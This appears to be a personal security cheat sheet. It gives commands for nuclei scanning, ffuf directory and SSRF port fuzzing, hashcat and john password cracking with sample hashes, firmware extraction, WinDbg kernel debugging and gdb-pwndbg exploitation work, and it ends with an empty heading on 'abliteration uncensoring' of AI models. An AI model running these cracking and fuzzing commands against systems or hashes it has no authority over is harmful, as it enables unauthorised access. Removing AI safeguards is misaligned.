### the standard EFI boot binary location is /efi/boot/bootx64.efi
mount /dev/sdb1 /efi && cd /efi
mkdir EFI/boot && cd EFI/boot
wget https://github.com/tianocore/edk2/raw/UDK2018/ShellBinPkg/UefiShell/X64/Shell.efi -O bootx64.efi
# where /dev/sdb1 must be fat32 formatted partition with "efi system" gpt label
# make sure no other efi/boot/bootx64.efi binaries are present on other partitions

Usage

# show mapping table
map

# set directory to storage device
$DEVICE_NAME:
# e.g.
FS0:

# load an EFI driver
load ./bin.efi

# execute a binary
./path/to/bin

Recon

DAST

nuclei

# generic scan (default fingerprinting templates)
nuclei -u https://example.com

# use with a custom template
nuclei -u https://example.com -t ./my-template.yaml

# use with multiple URLs and multiple templates
git clone https://github.com/projectdiscovery/nuclei-templates.git
nuclei -l urls.txt -t 'nuclei-templates/passive/cves/2024/*.yaml'

Fuzzing

ffuf

ffuf -c [colorize output] -mc 200,301 [match status codes] -fc 404 [exclude status codes from response] -u https://google.com/FUZZ -w [WORDLIST_PATH] -recursion -e .exe [files with .exe] -s [silent] -of html [output in html file] -o output-file -b "cookie1=smth; cookie2=smth" -H "X-Custom-Header: smth" -se [stop on errors] -p 2 [2 second delay] -t 150 [threads]


################
### EXAMPLES ###
################
# classic directory FUZZ
ffuf -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

ffuf -c -mc 200,301 -fc 404 -u http://example.com/FUZZ -w ~/seclists/discovery/web-content/raft-large-words.txt -t 150 -e '.php,.html'
ffuf -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-large-words.txt -t 150 -e $(cat /root/SecLists/Discovery/Web-Content/web-extensions-comma_separated.txt)

# FUZZ HTTP verbs
ffuf -c -u 'http://WIN-KML6TP4LOOL.CONTOSO.ORG' -X FUZZ -w ~/SecLists/Fuzzing/http-request-methods.txt

# recursive directory FUZZ
ffuf -c -fc 404 -u http://example.com/FUZZ -recursion -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

# FUZZ when on different subdomain (without adding it to /etc/hosts)
ffuf -c -H 'Host: something.example.com' -w '~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt' -u 'http://example.com/FUZZ'

# single IP subdomain enumeration (note that `-u` param is only for IP discovery, to enumerate subdomains on a specific IP you need to FUZZ Host header) (if you wanna enumerate DNS instead see * gobuster)
ffuf -c -H 'Host: FUZZ.example.com' -w '~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt' -u 'http://example.com'

# multiple wordlists (default mode is clusterbomb (all combinations))
ffuf -c -mode pitchfork -H 'Host: SUBD.example.com' -u 'http://example.com/PATH' -w '~/wordlist_subdomain.txt:SUBD' -w '~/wordlist_path.txt:PATH' -replay-proxy 'http://127.0.0.1:8080'

# FUZZ ports in the request file
# (let's say we have a plain request from burp with a SSRF and we wanna enumerate ports)
# see [HTB Editorial]{https://youtu.be/eggi_GQo9fk?t=467}
ffuf -request ssrf.txt -request-proto http -w <(seq 1 65535)

# rate limit
ffuf -rate 20 -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

# forward to burp
# in burp, i add new proxy at 3333 and tell it to forward to 9595
ffuf -c -u http://localhost:3333/ # ...

Hashcracking

hashcat

### OPTIONS
--help              # display hash types
-m [hash_type]      # specify hash type
-a [mode]           # specify attack-mode (???)
-O                  # enable optimized kernel mode

--increment         # increment applied mask by 1


################
### EXAMPLES ###
################
hashcat -O -a 0 -m 3200 hash.txt ~/SecLists/rockyou.txt
hashcat 'iamthehash'                                           # determine hash type
hashcat -O -a 0 -m 1800 '$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/' ~/SecLists/rockyou.txt

# Cracked password is supplied in the following format:
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho


### Hashcat show examples for pbkdf2 + sha256
hashcat --example-hashes --mach | grep -i pbkdf2 | grep sha256


### MASKS
# https://hashcat.net/wiki/doku.php?id=mask_attack
hashcat -m 1400 -O -a 3 --increment 'abeb6f8eb5722b8ca3b45f6f72a' 'susan_nasus_?d?d?d?d?d?d?d?d?d?d'

hashcat -m 1400 -O -a 6 "somehash" example.dict ?d?d?d?d
# password0000
# password0001

hashcat -m 1400 -O -a 7 "somehash" ?d?d?d?d example.dict
# 0000password
# 0001password

hashcat -m 1400 -O -a 7 "somehash" dict1.txt dict2.txt

john

# john works with files, store hash into a file first
echo 'dsgf27g86df26f287df86f3' | tee -a hash.txt

# determine possible formats
john --show=formats hash.txt

# crack using a specific format
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# crack using all formats
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

CLI

LUKS

create LUKS directory-in-file

https://www.lpenz.org/articles/luksfile/

dd if=/dev/zero of=cryptfile.img bs=1M count=64
sudo cryptsetup luksFormat cryptfile.img
sudo cryptsetup luksOpen cryptfile.img cryptdev
sudo mkfs.ext4 /dev/mapper/cryptdev
sudo cryptsetup luksClose cryptdev

# mount
sudo cryptsetup luksOpen cryptfile.img cryptdev
sudo mount -t auto /dev/mapper/cryptdev ./cryptdir

# umount
sudo umount cryptdir
sudo cryptsetup luksClose cryptdev

gpg

keys

gpg --full-gen-key
gpg --list-keys
gpg --edit-key user-id

message exchange

# export public key from a keyring to a file
gpg --output $FILE --export $KEY_UID            # add --armor to export in ASCII
# sign a file with a public key 
gpg --output $OUT_FILE --encrypt --recipient $KEY_UID $FILE

signature verification

Retrieves public key address from .sig file and fetches it from the remote server

gpg --keyserver-options auto-key-retrieve --verify Downloads/archlinux-2023.09.01-x86_64.iso.sig Documents/archlinux-2023.09.01-x86_64.iso

openssl

generate certificate with SAN for Proxmox

openssl req -new -newkey rsa:2048 -nodes -keyout pve.key -out pve.csr -subj "/OU=PVE Cluster Node/O=Proxmox Virtual Environment/CN=pve.aperture.ad" -addext "subjectAltName=DNS:pve.aperture.ad,DNS:127.0.0.1,DNS:localhost,DNS:pve,DNS:192.168.88.69" && openssl x509 -req -in pve.csr -CA k8s-aperture-root-ca-01.crt -CAkey k8s-aperture-root-ca-01.key -CAcreateserial -out pve.crt -days 365 -sha256 -extfile <(printf "subjectAltName=DNS:pve.aperture.ad,DNS:127.0.0.1,DNS:localhost,DNS:pve,DNS:192.168.88.69")

pass

usage

gpg --full-gen-key
pass init $GPG_ID                   # will reencrypt

# Usage
pass ls                             # list passwords
pass insert dir/file                # Insert password
pass -c dir/file                    # Copy password to clipboard
pass edit dir/file                  # Insert other fields
pass generate dir/file $NUM         # Generate password

# change pass dir (should have .gpg-id file)
PASSWORD_STORE_DIR=/mnt/sda1/my/password/storage

FW RE

Misc

extract Lnux from zImage compressed with LZMA

vmlinux-to-elf

./vmlinux-to-elf <input_kernel.bin> <output_kernel.elf>

mount jffs2, because binwalk is unable to

mount.jffs2

  binwalk -Mqe 01-00000024-U00000024.bin

  cd _01-00000024-U00000024.bin.extracted/_0.extracted

  mkdir jffs2_root

  sudo mount.jffs2 0.jffs2 jffs2_root
  # Sanity check passed...
  # Image 0.jffs2 sucessfully mounted on jffs2_root

  cd jffs2_root && ls
  # bin  cfez.bin  config  lib  Megafon  webroot

unpack android bootimg

android-unpackbootimg

mkdir kernel && unpackbootimg -i 03-00030000-Kernel.bin -o kernel && cd kernel
# Android magic found at: 128
# BOARD_KERNEL_CMDLINE root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0,115200 rdinit=/init loglevel=5 mem=0x9200000
# BOARD_KERNEL_BASE 55e08000
# BOARD_NAME
# BOARD_PAGE_SIZE 2048
# BOARD_HASH_TYPE sha1
# BOARD_KERNEL_OFFSET 00008000
# BOARD_RAMDISK_OFFSET 01000000
# BOARD_SECOND_OFFSET 00f00000
# BOARD_TAGS_OFFSET 00000100

binwalk

usage

# recursive extract
binwalk -Me 01-00000010-U00000010.bin

# attempt to extract each datatype from it's starting address to it's ending address
ls -l _01-00000010-U00000010.bin.extracted

RE

Utils

windbg

Usage

https://github.com/f1zm0/WinDBG-Cheatsheet

# print memory state at the address specified in ESP pointer
db esp
# print 200 bytes
db esp L200

# dissasemble the function `GetCurrentThread` in `kernel32` DLL
u kernel32!GetCurrentThread

# show registers
r

display security descriptor at address

!sd $ADDRESS

Ace0 will contain the S-1-0-0 SID (all users). Use the following script to decode this mask: https://raw.githubusercontent.com/Xacone/Eneio64-Driver-Exploits/refs/heads/main/sd.py

0x00010000: "DELETE",
0x00020000: "READ_CONTROL",
0x00040000: "WRITE_DAC",
0x00080000: "WRITE_OWNER",
0x00100000: "SYNCHRONIZE",
0x00000001: "FILE_READ_DATA",
0x00000002: "FILE_WRITE_DATA",
0x00000004: "FILE_APPEND_DATA",
0x00000008: "FILE_READ_EA",
0x00000010: "FILE_WRITE_EA",
0x00000020: "FILE_EXECUTE",
0x00000040: "FILE_DELETE_CHILD",
0x00000080: "FILE_READ_ATTRIBUTES",
0x00000100: "FILE_WRITE_ATTRIBUTES",
0x00020000: "STANDARD_RIGHTS_READ",
0x00020000: "STANDARD_RIGHTS_WRITE",
0x00020000: "STANDARD_RIGHTS_EXECUTE",
0x001f0000: "STANDARD_RIGHTS_ALL",
0x10000000: "GENERIC_ALL",
0x20000000: "GENERIC_EXECUTE",
0x40000000: "GENERIC_WRITE",
0x80000000: "GENERIC_READ",

display structure property under specified address

DEVICE_OBJECT structure

typedef struct _DEVICE_OBJECT {
  PSECURITY_DESCRIPTOR SecurityDescriptor;
}
# return structure definition
dt $STRUCT
dt _DEVICE_OBJECT

# return specific structure
dt $STRUCT $ADDRESS
dt _DEVICE_OBJECT ffffe2010f21b780

# return specific attribute within the specific structure
dt $STRUCT $ADDRESS $ATTRIBUTE
dt _DEVICE_OBJECT ffffe2010f21b780 SecurityDescriptor

search base address of a function by it’s symbol

# ensure symbols
.symfix
# reload ntdll.dll with symbols
.reload /f ntdll.dll

# display base address of an NtTraceEvent function within ntdll.dll by it's symbol
x ntdll!NtTraceEvent

# dissasemble the function
uf ntdll!NtTraceEvent

set conditional breakpoint when a certain value gets pushed into register

In order to stop when x00007ffcf3fa56f0 is pushed to RCX during a function execution:

Find the function offset. According to ghidra, function relative address is at 140004be1 (relative to image base) In order to set the breakpoint on a function you need to determine the relative address of this function relative to the module base (in our case the module is the executable itself).

Function VA (relative address) in ghidra is 140004be1, however in ghidra image base is different. For an x64 PE the default image base is 0x140000000, and it is the one set in ghidra.

Display image base in ghidra: Window -> Memory map -> Set Image Base (house icon)

Display image base in windbg:

0:000> !dh executable_name -f
# 00007ff7a3a10000 image base

Now you must compute an RVA by subtracting image base from VA:

140004be1 - 140000000 = 0x4be1
bp executable_name+0x4be1 "j (@rcx == 0x00007ffcf3fa56f0) ''; 'gc'"

windows driver debugging setup

# change boot configuration to include /debug option (???)
# BitLocker and secureboot need to be disabled first
bcdedit -debug on
  1. Launch windbg
  2. File -> Attach to kernel -> Local -> OK

BinExp

Utils

gdb-pwndbg

gdb-pwndbg ./file


# place a breakpoint at main
break main

# continue program execution
continue

# list functions
info functions

# run the program
run
run < payload.bin

# print first 20 entries in stack
stack 29

# step into
si
# step over
so


# generate cyclic 200 symbols
cyclic 200
# find offset of "waab"
cyclic -l waab


# breaks when EIP will be equal to 0xffff0d98 (insert while running)
watch $eip == 0xffff0d98



# display virtual memory map
vmmap

Applied

StT

whisper

Usage

git clone https://github.com/ggerganov/whisper.cpp
cd whisper.cpp
cmake -B build
cmake --build build -j --config Release

Transcribe:

arecord -r 16000 -c 1 -f S16_LE /tmp/input.wav || true
ffmpeg -y -i /tmp/input.wav -ar 16000 -ac 1 -c:a pcm_s16le /tmp/output.wav > /dev/null 2>&1
~/utils/whisper.cpp/build/bin/whisper-cli -m ~/utils/whisper.cpp/models/ggml-base.en.bin -f /tmp/output.wav

Data manipulation

Abliteration uncensoring